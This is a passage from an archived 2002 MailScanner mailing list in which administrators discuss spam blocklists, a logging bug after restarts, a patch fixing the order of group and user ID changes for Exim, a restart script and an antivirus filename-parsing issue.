> Mike Is that a better way to do it? I'd like to have it blocked before it is scanned (obviously). I thought the MTA would block it after. > Bruno -- Tom DuVally Lead Sys. Programmer CIS, Brown University From mike at CAMAROSS.NET Fri Sep 6 15:38:39 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:30 2006 Subject: Skilled spammers In-Reply-To: <1031322530.1635.17.camel@toms> Message-ID: I block mine at the MTA (sendmail) so the SMTP connection is dropped and the junk never even makes it to MS. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Thomas DuVally Sent: Friday, September 06, 2002 9:29 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Skilled spammers On Fri, 2002-09-06 at 09:56, Mike Kercher wrote: > Are you using any of the dnsbl's? I use spamcop, osirusoft and ordb and very few sneak through. I use the dns zones at the MTA and > not in SA/MS > > Mike Is that a better way to do it? I'd like to have it blocked before it is scanned (obviously). I thought the MTA would block it after. > Bruno -- Tom DuVally Lead Sys. Programmer CIS, Brown University From Denis.Beauchemin at USHERBROOKE.CA Fri Sep 6 16:07:20 2002 From: Denis.Beauchemin at USHERBROOKE.CA (Denis Beauchemin) Date: Thu Jan 12 21:15:30 2006 Subject: MailScanner stops logging Message-ID: <1031324840.32171.22.camel@dbeauchemin.si.usherb.ca> Hello, I am an happy MailScanner user... but I have a problem with MailScanner (3.22-8) that stops logging to syslog. Restarting MailScanner (service mailscanner restart) makes it log again. I believe this occurs after an automatic restart (after 4 hours) as my log shows: Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanning 1 messages, 5005 bytes Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanned 1 messages, 5005 bytes in 0 seconds Sep 5 15:15:08 smtp3 mailscanner[9375]: MailScanner E-Mail Virus Scanner version 3.22 starting. Sep 5 15:15:08 smtp3 mailscanner[9375]: Configuring mailscanner for sendmail... Sep 5 15:15:08 smtp3 mailscanner[9375]: Using locktype = flock Sep 5 19:15:09 smtp3 mailscanner[26370]: MailScanner E-Mail Virus Scanner version 3.22 starting. Sep 5 19:15:09 smtp3 mailscanner[26370]: Configuring mailscanner for sendmail... This is not (yet) a heavily used server (around 10 messages/hour) but there were no log entries until I restarted MailScanner this morning. I know it was working because it blocked a Yaha infected email and tagged some SPAM. But nothing in the logs... I am on Red Hat 7.3 with Perl v5.6.1. Any ideas of what might be happening? Thanks! Denis -- Denis Beauchemin, analyste Universit? de Sherbrooke, S.T.I. T: 819.821.8000x2252 F: 819.821.8045 From sean at NISD.NET Fri Sep 6 16:12:19 2002 From: sean at NISD.NET (Sean Embry) Date: Thu Jan 12 21:15:30 2006 Subject: MailScanner stops logging Message-ID: I have a somewhat simular problem, but it's because I rotate logs daily instead of weekly. Sending a kill -1 to syslog fixes it. I have that in my rotete script, but it doesn't work. :L Sean Embry Systems/Database Administrator Northside Independent School District San Antonio TX 78238 (210) 706-8790 >>> Denis.Beauchemin@USHERBROOKE.CA 09/06/02 10:07AM >>> Hello, I am an happy MailScanner user... but I have a problem with MailScanner (3.22-8) that stops logging to syslog. Restarting MailScanner (service mailscanner restart) makes it log again. I believe this occurs after an automatic restart (after 4 hours) as my log shows: Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanning 1 messages, 5005 bytes Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanned 1 messages, 5005 bytes in 0 seconds Sep 5 15:15:08 smtp3 mailscanner[9375]: MailScanner E-Mail Virus Scanner version 3.22 starting. Sep 5 15:15:08 smtp3 mailscanner[9375]: Configuring mailscanner for sendmail... Sep 5 15:15:08 smtp3 mailscanner[9375]: Using locktype = flock Sep 5 19:15:09 smtp3 mailscanner[26370]: MailScanner E-Mail Virus Scanner version 3.22 starting. Sep 5 19:15:09 smtp3 mailscanner[26370]: Configuring mailscanner for sendmail... This is not (yet) a heavily used server (around 10 messages/hour) but there were no log entries until I restarted MailScanner this morning. I know it was working because it blocked a Yaha infected email and tagged some SPAM. But nothing in the logs... I am on Red Hat 7.3 with Perl v5.6.1. Any ideas of what might be happening? Thanks! Denis -- Denis Beauchemin, analyste Universit? de Sherbrooke, S.T.I. T: 819.821.8000x2252 F: 819.821.8045 From mailscanner at ecs.soton.ac.uk Fri Sep 6 17:33:51 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: Maps-RBL+ question In-Reply-To: Message-ID: <5.1.0.14.2.20020906173225.02beef48@imap.ecs.soton.ac.uk> At 10:31 06/09/2002, you wrote: >I have recently installed and successfully configured MailScanner, >along with SA and very impressed I am too. :-) >Within the MailScanner config I have enabled maps-rbl+ to point >to rbl-plus.mail-abuse.ja.net this was previously checked from >within Sendmail. Am I correct in thinking that my MTA will now >pass messages from maps-rbl+ listed hosts, but tag them as >{SPAM?} - If this is the case would I not be better performing the >check within sendmail, thus reducing the number of messages >being sent to my users. If you want to completely stop all delivery of messages from maps-rbl+ hosts, then do it in sendmail. From there, the only thing you can do is either deliver it ditch it. If you want to deliver it but have it {SPAM?}-tagged as well, then you will have to do that within MailScanner. It's not your MTA that is adding the {SPAM?} tags, it's MailScanner. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Jon at XNEXT.COM Fri Sep 6 18:07:08 2002 From: Jon at XNEXT.COM (Jonothon Ortiz) Date: Thu Jan 12 21:15:30 2006 Subject: Qmail In-Reply-To: <5.1.0.14.2.20020906173225.02beef48@imap.ecs.soton.ac.uk> Message-ID: <000001c255c7$d5d84ad0$246fa8c0@xn2.net> Hey; Just curious if ayone's had success with Qmail & MS =) Jonothon Ortiz Vice President Xnext, Inc. Macromedia Alliance Partners http://www.Xnext.com mailto:Jon@Xnext.com From lbergman at abi.tconline.net Fri Sep 6 18:15:05 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:30 2006 Subject: Qmail In-Reply-To: <000001c255c7$d5d84ad0$246fa8c0@xn2.net> References: <000001c255c7$d5d84ad0$246fa8c0@xn2.net> Message-ID: <200209061215.05560.lbergman@abi.tconline.net> On Friday 06 September 2002 12:07 pm, Jonothon Ortiz wrote: > Hey; Just curious if ayone's had success with Qmail & MS =) There is an entry on the homepage to describe how to do this. -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From jaearick at COLBY.EDU Fri Sep 6 19:24:56 2002 From: jaearick at COLBY.EDU (Jeff A. Earickson) Date: Thu Jan 12 21:15:30 2006 Subject: upgrade to SA 2-40, spamd syslog msgs??? Message-ID: Julian, I upgraded from spamassassin-2.31 to 2.40 today (with mailscanner 3.22.11, Sol8) and now I am seeing the attached syslog messages for spamd. Hunh? I thought that mailscanner didn't use spamd. All of the spamd stuff seems to locally generated email for me, probably from root. What gives? ** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 ** Senior UNIX Sysadmin, Information Technology EMAIL: jaearick@colby.edu ** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 ** Waterville ME, 04901-8842 ---------------------------------------------------------------------------- -------------- next part -------------- Sep 6 13:03:38 emerald spamd[2517]: server started on port 48373 (running version 2.40-cvs) Sep 6 13:03:39 emerald spamd[2517]: connection from localhost [ 127.0.0.1 ] at port 52393 Sep 6 13:03:39 emerald spamd[2524]: processing message <9PS291LhupY> for jaearick:13462, expecting 1544 bytes. Sep 6 13:03:40 emerald spamd[2524]: identified spam (25.6/5.0) for jaearick:13462 in 1 seconds, 1544 bytes. Sep 6 13:03:40 emerald spamd[2517]: server killed by SIGTERM, shutting down Sep 6 13:03:43 emerald spamd[2529]: server started on port 48373 (running version 2.40-cvs) Sep 6 13:03:44 emerald spamd[2529]: server killed by SIGTERM, shutting down Sep 6 13:03:48 emerald spamd[2550]: server started on port 18972 (running version 2.40-cvs) Sep 6 13:03:49 emerald spamd[2550]: connection from localhost [ 127.0.0.1 ] at port 52416 Sep 6 13:03:49 emerald spamd[2566]: processing message <9PS291LhupY> for jaearick:13462, expecting 1544 bytes. Sep 6 13:03:49 emerald spamd[2566]: identified spam (25.6/5.0) for jaearick:13462 in 0 seconds, 1544 bytes. Sep 6 13:03:49 emerald spamd[2550]: server killed by SIGTERM, shutting down Sep 6 13:03:52 emerald spamd[2574]: server started on port 48373 (running version 2.40-cvs) Sep 6 13:03:54 emerald spamd[2574]: connection from localhost [ 127.0.0.1 ] at port 52425 Sep 6 13:03:54 emerald spamd[2592]: processing message <9PS291LhupY> for jaearick:13462, expecting 1544 bytes. Sep 6 13:03:54 emerald spamd[2592]: identified spam (6.9/5.0) for jaearick:13462 in 0 seconds, 1544 bytes. Sep 6 13:03:54 emerald spamd[2574]: server killed by SIGTERM, shutting down Sep 6 13:08:18 emerald spamd[4071]: server started on port 48373 Sep 6 13:08:20 emerald spamd[4071]: connection from localhost [ 127.0.0.1 ] at port 53073 Sep 6 13:08:21 emerald spamd[4083]: identified spam (44.2/5.0) for jaearick:13462 in 1 seconds, 1544 bytes. Sep 6 13:08:21 emerald spamd[4071]: server killed by SIGTERM, shutting down Sep 6 13:08:23 emerald spamd[4093]: server started on port 48373 Sep 6 13:08:25 emerald spamd[4093]: connection from localhost [ 127.0.0.1 ] at port 53087 Sep 6 13:08:25 emerald spamd[4093]: server killed by SIGTERM, shutting down Sep 6 13:08:25 emerald spamd[4112]: skipped large message in 0 seconds. Sep 6 13:08:27 emerald spamd[4115]: server started on port 18972 Sep 6 13:08:27 emerald spamd[4115]: connection from localhost [ 127.0.0.1 ] at port 53088 Sep 6 13:08:28 emerald spamd[4121]: identified spam (44.2/5.0) for jaearick:13462 in 1 seconds, 1544 bytes. Sep 6 13:08:28 emerald spamd[4115]: server killed by SIGTERM, shutting down Sep 6 13:08:30 emerald spamd[4124]: server started on port 48373 Sep 6 13:08:30 emerald spamd[4124]: connection from localhost [ 127.0.0.1 ] at port 53096 Sep 6 13:08:30 emerald spamd[4132]: identified spam (6.6/5.0) for jaearick:13462 in 0 seconds, 1544 bytes. Sep 6 13:08:30 emerald spamd[4124]: server killed by SIGTERM, shutting down Sep 6 13:10:20 emerald spamd[4615]: server started on port 48373 (running version 2.40-cvs) Sep 6 13:10:22 emerald spamd[4615]: connection from localhost [ 127.0.0.1 ] at port 53382 Sep 6 13:10:22 emerald spamd[4626]: processing message <9PS291LhupY> for jaearick:13462, expecting 1544 bytes. Sep 6 13:10:22 emerald spamd[4626]: identified spam (25.6/5.0) for jaearick:13462 in 0 seconds, 1544 bytes. Sep 6 13:10:22 emerald spamd[4615]: server killed by SIGTERM, shutting down Sep 6 13:10:25 emerald spamd[4631]: server started on port 48373 (running version 2.40-cvs) Sep 6 13:10:26 emerald spamd[4631]: server killed by SIGTERM, shutting down Sep 6 13:10:30 emerald spamd[4640]: server started on port 18972 (running version 2.40-cvs) Sep 6 13:10:31 emerald spamd[4640]: connection from localhost [ 127.0.0.1 ] at port 53400 Sep 6 13:10:31 emerald spamd[4661]: processing message <9PS291LhupY> for jaearick:13462, expecting 1544 bytes. Sep 6 13:10:31 emerald spamd[4661]: identified spam (25.6/5.0) for jaearick:13462 in 0 seconds, 1544 bytes. Sep 6 13:10:31 emerald spamd[4640]: server killed by SIGTERM, shutting down Sep 6 13:10:34 emerald spamd[4665]: server started on port 48373 (running version 2.40-cvs) Sep 6 13:10:36 emerald spamd[4665]: connection from localhost [ 127.0.0.1 ] at port 53406 Sep 6 13:10:36 emerald spamd[4672]: processing message <9PS291LhupY> for jaearick:13462, expecting 1544 bytes. Sep 6 13:10:36 emerald spamd[4672]: identified spam (6.9/5.0) for jaearick:13462 in 0 seconds, 1544 bytes. Sep 6 13:10:36 emerald spamd[4665]: server killed by SIGTERM, shutting down From doko at CS.TU-BERLIN.DE Fri Sep 6 20:06:44 2002 From: doko at CS.TU-BERLIN.DE (Matthias Klose) Date: Thu Jan 12 21:15:30 2006 Subject: severe error when using exim Message-ID: <15736.64708.326823.572080@gargle.gargle.HOWL> when using exim as MTA, 3.22.12 first sets the uid, then the gid ... and fails. patch attached. there seems to be a copy & paste error in the group check as well. as an add on, it would be nice, if mailscanner would log the fact, that it exits, to syslog as well. The only thing you see now is that setting the gid fails. no hint on the exit. --- mailscanner/bin/mailscanner~ 2002-08-25 16:38:33.000000000 +0200 +++ mailscanner/bin/mailscanner 2002-09-06 21:00:40.000000000 +0200 @@ -123,6 +123,14 @@ # Tried to set [u,g]id after writing pid, but then it fails when it re-execs itself. # Using the posix calls because I don't want to have to bother to find out what # happens when "$< = $uid" fails (i.e. not running as root). Yet. +if ($Config::RunAsGroup ne "") { + my $gid = getgrnam($Config::RunAsGroup); + if ($gid) { # Only do this if setting to non-root + Log::InfoLog("ECS MailScanner setting GID to $Config::RunAsGroup ($gid)"); + POSIX::setgid($gid) or Log::DieLog("Can't set GID $gid"); + } +} + if ($Config::RunAsUser ne "") { my $uid = getpwnam($Config::RunAsUser); if ($uid) { # Only do this if setting to non-root @@ -131,14 +139,6 @@ } } -if ($Config::RunAsUser ne "") { - my $gid = getgrnam($Config::RunAsGroup); - if ($gid) { # Only do this if setting to non-root - Log::InfoLog("ECS MailScanner setting GID to $Config::RunAsGroup ($gid)"); - POSIX::setgid($gid) or Log::DieLog("Can't set GID $gid"); - } -} - $> = $<; $) = $(; From Denis.Beauchemin at USHERBROOKE.CA Fri Sep 6 20:56:24 2002 From: Denis.Beauchemin at USHERBROOKE.CA (Denis Beauchemin) Date: Thu Jan 12 21:15:30 2006 Subject: MailScanner stops logging In-Reply-To: <1031324840.32171.22.camel@dbeauchemin.si.usherb.ca> References: <1031324840.32171.22.camel@dbeauchemin.si.usherb.ca> Message-ID: <1031342185.32171.33.camel@dbeauchemin.si.usherb.ca> I just checked and my MailScanner stopped logging again, after it recycled itself. Executing "service mailscanner restart" restarts logging. Should I stop the automatic MailScanner recycling or recycle it in the cron using the "service mailscanner restart" command? Denis On Fri, 2002-09-06 at 11:07, Denis Beauchemin wrote: > Hello, > > I am an happy MailScanner user... but I have a problem with MailScanner > (3.22-8) that stops logging to syslog. Restarting MailScanner (service > mailscanner restart) makes it log again. > > I believe this occurs after an automatic restart (after 4 hours) as my > log shows: > Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanning 1 messages, 5005 bytes > Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanned 1 messages, 5005 bytes in 0 seconds > Sep 5 15:15:08 smtp3 mailscanner[9375]: MailScanner E-Mail Virus Scanner version 3.22 starting. > Sep 5 15:15:08 smtp3 mailscanner[9375]: Configuring mailscanner for sendmail... > Sep 5 15:15:08 smtp3 mailscanner[9375]: Using locktype = flock > Sep 5 19:15:09 smtp3 mailscanner[26370]: MailScanner E-Mail Virus Scanner version 3.22 starting. > Sep 5 19:15:09 smtp3 mailscanner[26370]: Configuring mailscanner for sendmail... > > This is not (yet) a heavily used server (around 10 messages/hour) but > there were no log entries until I restarted MailScanner this morning. I > know it was working because it blocked a Yaha infected email and tagged > some SPAM. But nothing in the logs... > > I am on Red Hat 7.3 with Perl v5.6.1. > > Any ideas of what might be happening? > > Thanks! > > Denis > -- > Denis Beauchemin, analyste > Universit? de Sherbrooke, S.T.I. > T: 819.821.8000x2252 F: 819.821.8045 > -- Denis Beauchemin, analyste Universit? de Sherbrooke, S.T.I. T: 819.821.8000x2252 F: 819.821.8045 From mailscanner at ecs.soton.ac.uk Fri Sep 6 21:46:53 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: severe error when using exim In-Reply-To: <15736.64708.326823.572080@gargle.gargle.HOWL> Message-ID: <5.1.0.14.2.20020906214333.02c68d90@imap.ecs.soton.ac.uk> Well spotted! I'm slightly surprised no-one has noticed this before, I guess there can't be many Exim users out there... As you say, it's a copy-and-paste error :( I'll get an updated version out tomorrow if I get time, it will include the "some attachment filenames containing '%'" fix as well. At 20:06 06/09/2002, you wrote: >when using exim as MTA, 3.22.12 first sets the uid, then the gid >... and fails. patch attached. there seems to be a copy & paste error >in the group check as well. > >as an add on, it would be nice, if mailscanner would log the fact, >that it exits, to syslog as well. The only thing you see now is that >setting the gid fails. no hint on the exit. > >--- mailscanner/bin/mailscanner~ 2002-08-25 16:38:33.000000000 +0200 >+++ mailscanner/bin/mailscanner 2002-09-06 21:00:40.000000000 +0200 >@@ -123,6 +123,14 @@ > # Tried to set [u,g]id after writing pid, but then it fails when it > re-execs itself. > # Using the posix calls because I don't want to have to bother to find > out what > # happens when "$< = $uid" fails (i.e. not running as root). Yet. >+if ($Config::RunAsGroup ne "") { >+ my $gid = getgrnam($Config::RunAsGroup); >+ if ($gid) { # Only do this if setting to non-root >+ Log::InfoLog("ECS MailScanner setting GID to $Config::RunAsGroup >($gid)"); >+ POSIX::setgid($gid) or Log::DieLog("Can't set GID $gid"); >+ } >+} >+ > if ($Config::RunAsUser ne "") { > my $uid = getpwnam($Config::RunAsUser); > if ($uid) { # Only do this if setting to non-root >@@ -131,14 +139,6 @@ > } > } > >-if ($Config::RunAsUser ne "") { >- my $gid = getgrnam($Config::RunAsGroup); >- if ($gid) { # Only do this if setting to non-root >- Log::InfoLog("ECS MailScanner setting GID to $Config::RunAsGroup >($gid)"); >- POSIX::setgid($gid) or Log::DieLog("Can't set GID $gid"); >- } >-} >- > > $> = $<; > $) = $(; -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 6 21:50:39 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: MailScanner stops logging In-Reply-To: <1031342185.32171.33.camel@dbeauchemin.si.usherb.ca> References: <1031324840.32171.22.camel@dbeauchemin.si.usherb.ca> <1031324840.32171.22.camel@dbeauchemin.si.usherb.ca> Message-ID: <5.1.0.14.2.20020906214659.0303a2b0@imap.ecs.soton.ac.uk> Has anyone got any ideas on this? I can't reproduce it on my systems and so it's got be beat at the moment :-( Your suggestion of a "service mailscanner restart" should work, but is slight overkill. If you use the pid file (/usr/local/MailScanner/var/virus.pid by default if I remember rightly, but it's in the mailscanner.conf file) and kill that process number, then call "check_mailscanner" to restart it, that will do all that's necessary. You can occasionally hit problems starting sendmail if you do it immediately after killing it (hence the "sleep" in the init.d script). #!/bin/sh pid=`cat /usr/local/MailScanner/var/virus.pid` kill $pid sleep 5 /usr/local/MailScanner/check_mailscanner >/dev/null 2>&1 should do the job nicely, but check I got the paths right! At 20:56 06/09/2002, you wrote: >I just checked and my MailScanner stopped logging again, after it >recycled itself. > >Executing "service mailscanner restart" restarts logging. > >Should I stop the automatic MailScanner recycling or recycle it in the >cron using the "service mailscanner restart" command? > >Denis >On Fri, 2002-09-06 at 11:07, Denis Beauchemin wrote: > > Hello, > > > > I am an happy MailScanner user... but I have a problem with MailScanner > > (3.22-8) that stops logging to syslog. Restarting MailScanner (service > > mailscanner restart) makes it log again. > > > > I believe this occurs after an automatic restart (after 4 hours) as my > > log shows: > > Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanning 1 messages, 5005 bytes > > Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanned 1 messages, 5005 bytes > in 0 seconds > > Sep 5 15:15:08 smtp3 mailscanner[9375]: MailScanner E-Mail Virus > Scanner version 3.22 starting. > > Sep 5 15:15:08 smtp3 mailscanner[9375]: Configuring mailscanner for > sendmail... > > Sep 5 15:15:08 smtp3 mailscanner[9375]: Using locktype = flock > > Sep 5 19:15:09 smtp3 mailscanner[26370]: MailScanner E-Mail Virus > Scanner version 3.22 starting. > > Sep 5 19:15:09 smtp3 mailscanner[26370]: Configuring mailscanner for > sendmail... > > > > This is not (yet) a heavily used server (around 10 messages/hour) but > > there were no log entries until I restarted MailScanner this morning. I > > know it was working because it blocked a Yaha infected email and tagged > > some SPAM. But nothing in the logs... > > > > I am on Red Hat 7.3 with Perl v5.6.1. > > > > Any ideas of what might be happening? > > > > Thanks! > > > > Denis > > -- > > Denis Beauchemin, analyste > > Universit? de Sherbrooke, S.T.I. > > T: 819.821.8000x2252 F: 819.821.8045 > > >-- >Denis Beauchemin, analyste >Universit? de Sherbrooke, S.T.I. >T: 819.821.8000x2252 F: 819.821.8045 -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Fri Sep 6 22:30:23 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:30 2006 Subject: MAILSCANNER: llew@LLEW.NET requested to join Message-ID: <200209062130.WAA01304@magpie.ecs.soton.ac.uk> Fri, 6 Sep 2002 22:30:23 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Llew Roberts . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER llew@LLEW.NET Llew Roberts The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+llew%40LLEW.NET+Llew+Roberts&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From smohan at VSNL.COM Sat Sep 7 07:52:54 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:30 2006 Subject: Signature for outgoing messages In-Reply-To: Message-ID: The sign all messages signs all messages local or external. Is it possible for me to enable sign only for messages going to external domains? Mohan From mailscanner at ecs.soton.ac.uk Sat Sep 7 09:49:33 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: Signature for outgoing messages In-Reply-To: References: Message-ID: <5.1.0.14.2.20020907094903.02454008@imap.ecs.soton.ac.uk> At 07:52 07/09/2002, you wrote: >The sign all messages signs all messages local or external. Is it possible >for me to enable sign only for messages going to external domains? This is another feature that will be in the next major release. It's coming on very well at the moment, but is still a few weeks away from release. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From munafo at PREZZEMOLO.POLITO.IT Sat Sep 7 10:04:20 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:30 2006 Subject: Possible F-Secure parsing problem Message-ID: <02090711042001.14884@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi. I use f-prot and f-secure as virus scanning engines and I noticed that sometime f-secure fails to report a virus. I use MailScanner 3.22. The problem seems to be related to virus contained in files whose name is parsed incorrectly (also from f-prot) and that are usually reported only by the extension. Here there is a recent example: > Sender: > Recipient: > Subject: Have a nice Epiphany > MessageID: g84N9HL09850 > Report: /var/spool/MailScanner/incoming/g84N9HL09850/.pif Infection: > W32/Klez.E@mm > Shortcuts to MS-Dos programs are very dangerous in email (.pif) In this case the filename contained in the attachment was 4th[1].pif but it was created in the quarantine directory as .pif So this may be related to f-secure not scanning 'hidden' files, even when --dumb is used. A quick search in recent report messages (I use to cancel them), seems to show that the problem happens mainly when the virus is contained in files whose name contains '[' and ']'. In all the other cases I get two reports, f-secure being the second engine to be invoked. > Sender: > Recipient: > Subject: END RedMeasure V4 > MessageID: g85CHmL21381 > Report: /var/spool/MailScanner/incoming/g85CHmL21381/END.exe Infection: > W32/Klez.H@mm > ./g85CHmL21381/END.exe infection: W95/Klez.H@mm Regards, Maurizio Munafo' - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9ecEUtgCCNnfQWWkRAvI9AKCVWeeA8P7/E5tQCYMIs/ibKpayIgCg3gCv NvVDDxCvrp2WSz35tBPecuE= =d1C6 -----END PGP SIGNATURE----- From x.mailscanner.mail at MELLONI.COM Sat Sep 7 11:35:17 2002 From: x.mailscanner.mail at MELLONI.COM (Bruno Melloni) Date: Thu Jan 12 21:15:30 2006 Subject: Skilled spammers Message-ID: <200209071035.g87AZHr24725@ori.rl.ac.uk> I use the default RBLs (free) that come with MailScanner and SpamAssassin. I am an individual and cannot afford to pay for RBL access. Anyway, I have managed to stop them through creative blacklisting, my question was about improving the two base tools - they are quite good as they are (stop 95% of my spam) and would be nice to make them even better so that people won't need to relay on yet more components. Bruno From jaearick at COLBY.EDU Sat Sep 7 11:45:33 2002 From: jaearick at COLBY.EDU (Jeff A. Earickson) Date: Thu Jan 12 21:15:30 2006 Subject: spamassassin upgrade, spamd, Doh! Message-ID: Julian, It dawned on me that I ran "make test" during the build of SA 2.40, which ran spamd, which syslogged what it did, which has nothing to do with mailscanner. Doh! ** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 ** Senior UNIX Sysadmin, Information Technology EMAIL: jaearick@colby.edu ** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 ** Waterville ME, 04901-8842 ---------------------------------------------------------------------------- From mike at CAMAROSS.NET Sat Sep 7 14:07:46 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:30 2006 Subject: Signature for outgoing messages In-Reply-To: <5.1.0.14.2.20020907094903.02454008@imap.ecs.soton.ac.uk> Message-ID: <003701c2566f$90eee890$6501a8c0@mikedesk> To expand on that, would it be possible to have the signing by sending domain? -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Julian Field Sent: Saturday, September 07, 2002 3:50 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Signature for outgoing messages At 07:52 07/09/2002, you wrote: >The sign all messages signs all messages local or external. Is it >possible for me to enable sign only for messages going to external >domains? This is another feature that will be in the next major release. It's coming on very well at the moment, but is still a few weeks away from release. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sat Sep 7 14:14:32 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: Signature for outgoing messages In-Reply-To: <003701c2566f$90eee890$6501a8c0@mikedesk> References: <5.1.0.14.2.20020907094903.02454008@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020907141348.024363e0@imap.ecs.soton.ac.uk> At 14:07 07/09/2002, you wrote: >To expand on that, would it be possible to have the signing by sending >domain? Yes, definitely. You will be able to choose the signature in a whole variety of different ways. >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On >Behalf Of Julian Field >Sent: Saturday, September 07, 2002 3:50 AM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: Signature for outgoing messages > > >At 07:52 07/09/2002, you wrote: > >The sign all messages signs all messages local or external. Is it > >possible for me to enable sign only for messages going to external > >domains? > >This is another feature that will be in the next major release. It's >coming on very well at the moment, but is still a few weeks away from >release. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mike at CAMAROSS.NET Sat Sep 7 14:18:52 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:30 2006 Subject: Signature for outgoing messages In-Reply-To: <5.1.0.14.2.20020907141348.024363e0@imap.ecs.soton.ac.uk> Message-ID: <003801c25671$1ccd3960$6501a8c0@mikedesk> You rock too hard for your own good! :) -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Julian Field Sent: Saturday, September 07, 2002 8:15 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Signature for outgoing messages At 14:07 07/09/2002, you wrote: >To expand on that, would it be possible to have the signing by sending >domain? Yes, definitely. You will be able to choose the signature in a whole variety of different ways. >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On >Behalf Of Julian Field >Sent: Saturday, September 07, 2002 3:50 AM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: Signature for outgoing messages > > >At 07:52 07/09/2002, you wrote: > >The sign all messages signs all messages local or external. Is it > >possible for me to enable sign only for messages going to external > >domains? > >This is another feature that will be in the next major release. It's >coming on very well at the moment, but is still a few weeks away from >release. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From brandonf at BFCONSULT.CO.ZA Sat Sep 7 14:55:27 2002 From: brandonf at BFCONSULT.CO.ZA (Brandon Friedman) Date: Thu Jan 12 21:15:30 2006 Subject: Qmail References: <000001c255c7$d5d84ad0$246fa8c0@xn2.net> Message-ID: <3D7A054F.3030902@bfconsult.co.za> I have also asked the question and received the same response!!!! I don't know how difficult it is to implement but I am willing to test if 